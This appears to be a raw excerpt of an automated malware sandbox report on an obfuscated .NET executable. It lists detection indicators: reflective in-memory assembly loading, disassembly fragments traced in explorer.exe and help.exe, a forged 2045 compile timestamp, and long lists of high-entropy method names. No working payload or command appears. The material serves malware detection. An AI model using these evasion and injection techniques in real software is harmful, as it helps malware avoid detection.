                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: duGqHKp0OUXaX1D.exe, Form1.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | .Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | .Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | .Net Code: TFAXeB9uP7 System.Reflection.Assembly.Load(byte[])
                Source: duGqHKp0OUXaX1D.exe | Static PE information: 0x8E073EEC [Wed Jul 5 03:52:12 2045 UTC]
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_004168EB push ecx; retf | 2_2_004168EC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_00416942 push edi; iretd | 2_2_00416949
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041646B push ecx; iretd | 2_2_00416495
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0040E46E push ebx; retf | 2_2_0040E480
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_00416496 push ecx; iretd | 2_2_00416495
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041D4B5 push eax; ret | 2_2_0041D508
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041D56C push eax; ret | 2_2_0041D572
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041D502 push eax; ret | 2_2_0041D508
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041D50B push eax; ret | 2_2_0041D572
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_019F09AD push ecx; mov dword ptr [esp], ecx | 2_2_019F09B6
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DE279B5 push esp; retn 0000h | 3_2_0DE27AE7
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DE27B02 push esp; retn 0000h | 3_2_0DE27B03
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DE27B1E push esp; retn 0000h | 3_2_0DE27B1F
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DF129B5 push esp; retn 0000h | 3_2_0DF12AE7
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DF12B1E push esp; retn 0000h | 3_2_0DF12B1F
                Source: C:\Windows\explorer.exe | Code function: 3_2_0DF12B02 push esp; retn 0000h | 3_2_0DF12B03
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_032C225F pushad ; ret | 4_2_032C27F9
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_032C27FA pushad ; ret | 4_2_032C27F9
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_032F09AD push ecx; mov dword ptr [esp], ecx | 4_2_032F09B6
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_032C283D push eax; iretd | 4_2_032C2858
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_02946496 push ecx; iretd | 4_2_02946495
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0293E46E push ebx; retf | 4_2_0293E480
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0294646B push ecx; iretd | 4_2_02946495
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_029468EB push ecx; retf | 4_2_029468EC
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_02946942 push edi; iretd | 4_2_02946949
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0294D4B5 push eax; ret | 4_2_0294D508
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0294D502 push eax; ret | 4_2_0294D508
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0294D50B push eax; ret | 4_2_0294D572
                Source: C:\Windows\SysWOW64\help.exe | Code function: 4_2_0294D56C push eax; ret | 4_2_0294D572
                Source: duGqHKp0OUXaX1D.exe | Static PE information: section name: .text entropy: 7.791946698624655
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, H8RxCCTG2lqB13Rl08.cs | High entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.cs | High entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, H8RxCCTG2lqB13Rl08.cs | High entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.cs | High entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, tgPQQSpR0cZ6BJWkVo.cs | High entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, DcAJfbQ7wU7SQxmjqR.cs | High entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, YaUinlTib1G3xUJPOx.cs | High entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, zRAipSun8hgJy3Uheq.cs | High entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, qE0oq1XplsihGx4BNY.cs | High entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IZbJDGjaUmyBRe2nxy.cs | High entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, KSpKq5GkZ2e2gbjFwb.cs | High entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | High entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, uoT09kIHHMyfn8k20q.cs | High entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, YXA4VUAH5cVt00ZnJcT.cs | High entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, m8uJgY73CdHyRifmxg.cs | High entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, iJiuUURx6BmonEAn91.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, vtJBxfzNv9wOY7atj5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, AxtYIpAq3ggUPiNYJYF.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, tZxNpwUkfdaCGoMB9E.cs | High entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, wsigysEuE6eJpHB7Ro.cs | High entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, gLEsblyEGraNajGcH9.cs | High entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, fk1UIvgrsuxnreKTRg.cs | High entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, NEVdnhvnVgEaSNcLx9.cs | High entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, SALVIvcA2ajS2o3C0N.cs | High entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, tgPQQSpR0cZ6BJWkVo.cs | High entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, DcAJfbQ7wU7SQxmjqR.csHigh entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, YaUinlTib1G3xUJPOx.csHigh entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, zRAipSun8hgJy3Uheq.csHigh entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, qE0oq1XplsihGx4BNY.csHigh entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IZbJDGjaUmyBRe2nxy.csHigh entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, KSpKq5GkZ2e2gbjFwb.csHigh entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.csHigh entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, uoT09kIHHMyfn8k20q.csHigh entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, YXA4VUAH5cVt00ZnJcT.csHigh entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, m8uJgY73CdHyRifmxg.csHigh entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, iJiuUURx6BmonEAn91.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, vtJBxfzNv9wOY7atj5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, AxtYIpAq3ggUPiNYJYF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, tZxNpwUkfdaCGoMB9E.csHigh entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, wsigysEuE6eJpHB7Ro.csHigh entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, gLEsblyEGraNajGcH9.csHigh entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, fk1UIvgrsuxnreKTRg.csHigh entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, NEVdnhvnVgEaSNcLx9.csHigh entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, SALVIvcA2ajS2o3C0N.csHigh entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, tgPQQSpR0cZ6BJWkVo.csHigh entropy of concatenated method names: 'kjd0QovUdX', 'psR0TASxMv', 'Nd10yCSdbR', 'KIh0Cs6Lq5', 'yoH0aNmXnv', 'EMO0bxS3KW', 'A6C09ckOkj', 'oOc0hFa3cv', 'fel0d0cM1y', 'fuI0Si4oRe'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, DcAJfbQ7wU7SQxmjqR.csHigh entropy of concatenated method names: 'AIZGvMIYxc', 'jVFG2G5CLv', 'wjAGIRc7mI', 'CS1Gxhv0tL', 'F3kGmo8IBU', 'kL3GgfmEE4', 'zdyGBn2RrV', 'GrYGE8ldQQ', 'K0hG7Zies6', 'HOxGjLLSDw'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, YaUinlTib1G3xUJPOx.csHigh entropy of concatenated method names: 'mduRDbTXyh', 'xyCRMVb4F8', 'vhpRQg2FYT', 'uANRTEO2kV', 'CMaRPJKSoU', 'T6lRZYa8Un', 'gHiRrVhafe', 'CanR5KtgUS', 'N5pRsnu5j7', 'MlqR8d5b3h'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, zRAipSun8hgJy3Uheq.csHigh entropy of concatenated method names: 'JUStw0D4ZK', 'LaqtWEKyhp', 'eh7teMM5FZ', 'MogtDgLRmY', 'Gxnt68QyS3', 'Y47tMF3mB1', 'Gg3tkJGD7w', 'M30tQYESaC', 'YabtT4Eqrb', 'z35tckeshI'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, qE0oq1XplsihGx4BNY.csHigh entropy of concatenated method names: 'mTQAtcAJfb', 'XwUAO7SQxm', 'iibAL1G3xU', 'mPOAJx2ALV', 'f3CAP0NGLE', 'rblAZEGraN', 'ydKuVd65nUt1UIHvNP', 'OtMocTmDNmT3EB7AnQ', 'W3GAAoMntK', 'VU2Aq019to'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IZbJDGjaUmyBRe2nxy.csHigh entropy of concatenated method names: 'IP1sAZqJ7N', 'Qnasqe730m', 'ikUsXb0Rrl', 'WFssoB0QCe', 'J8qsGts424', 'bAqsVv4KfP', 'lrSsldrYm7', 'l0e5Be8dTD', 'h2R5ESCGv5', 'WrF576pKjp'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, KSpKq5GkZ2e2gbjFwb.csHigh entropy of concatenated method names: 'Dispose', 'VKhA7AV4va', 'XD2UClPSZw', 'qQ1NNISnFv', 'NYsAjigysu', 'X6eAzJpHB7', 'ProcessDialogKey', 'hoLUH8uJgY', 'uCdUAHyRif', 'UxgUU4ZbJD'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.csHigh entropy of concatenated method names: 'tpTqiZMW03', 'mAQqoQTBIR', 're6qGv5Xd5', 'ljuqRZ3jQu', 'cxyqVAIwOg', 'BpMqlk6b5s', 'l5Yqt1QeXv', 'tNAqOdupiT', 'DEmqFU5Iv6', 'nMJqLAXKYW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, uoT09kIHHMyfn8k20q.csHigh entropy of concatenated method names: 'ToString', 'NmVZSQXOLQ', 'dMSZCYQEu5', 'gvHZ4m3pqa', 'zmFZaM1yod', 'aOxZbqyhuB', 'tOjZKjWdj8', 'hy8Z9cTDHj', 'sdjZh9yo9d', 'twlZux9fqS'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, YXA4VUAH5cVt00ZnJcT.csHigh entropy of concatenated method names: 'GmHswIPyLL', 'phZsWdO70k', 'l2NseTum5C', 'aiHsDnhnuv', 'fQ7s6Myh7D', 'W2esMbM9as', 'vVbskALrDq', 'qyIsQ5kScc', 'DIOsTxptNx', 'OO8scamPBd'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, m8uJgY73CdHyRifmxg.csHigh entropy of concatenated method names: 'o6v5yvhL2B', 'LUU5CULTLU', 'HEm54RvnpH', 'Hx35a6tuIj', 'Jvu5vbiTbE', 'Y1s5b4b3A3', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, iJiuUURx6BmonEAn91.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KorU7TVeQN', 'gnMUjoAgnl', 'lWnUzpOTJp', 'JgdqHNd2VK', 'gBeqAmWDQn', 'RmwqUvlgDM', 'bspqqNIw56', 'ctYXgftxHO69tC0acCW'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, vtJBxfzNv9wOY7atj5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Klks0nQTOT', 'SZKsPAX4Ig', 'EGwsZiWXiH', 'p2usr7Z2pp', 'eqFs5WG83k', 'A4Ess4GYMN', 'gcms8vJWmJ'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, AxtYIpAq3ggUPiNYJYF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qHF8vaxdBZ', 'UqE82q2T8K', 'z4t8Im2D2F', 'Yoc8xuBGGs', 'QFa8mkSNtM', 'WlO8gyEqac', 'Kl38BGem0a'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, tZxNpwUkfdaCGoMB9E.csHigh entropy of concatenated method names: 'yxJehwIAp', 'pr1DBKBLn', 'VhPMtP0HA', 'HQ9kG9rBS', 'ibYTXmnQc', 'wS3cjffDi', 'FGK19HZe9bDfvmvZ3E', 'AQ2NLc7hlyKswQb9CT', 'tYA51LJua', 'Rin8Wsi0Z'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, wsigysEuE6eJpHB7Ro.csHigh entropy of concatenated method names: 'OCl5onRdeW', 'mZy5Ggymob', 'OvN5RebW6K', 'PIU5VOa8HK', 'pyJ5lX6AXP', 'QRf5tt16M7', 'fAP5OYJN3a', 'bTC5F6EpSv', 'vni5L7bEiM', 'QlP5J1vMU4'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, gLEsblyEGraNajGcH9.csHigh entropy of concatenated method names: 'xWCliTor7n', 'hUplGr8tlj', 'zUdlVJZC5W', 'y7wlttBN4D', 'LcQlOcHX6B', 'KnrVmWuu6a', 'NUyVgeK0Rv', 'kSKVB0e4WG', 'okjVE6tr9r', 'bpZV70xZPo'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, fk1UIvgrsuxnreKTRg.csHigh entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
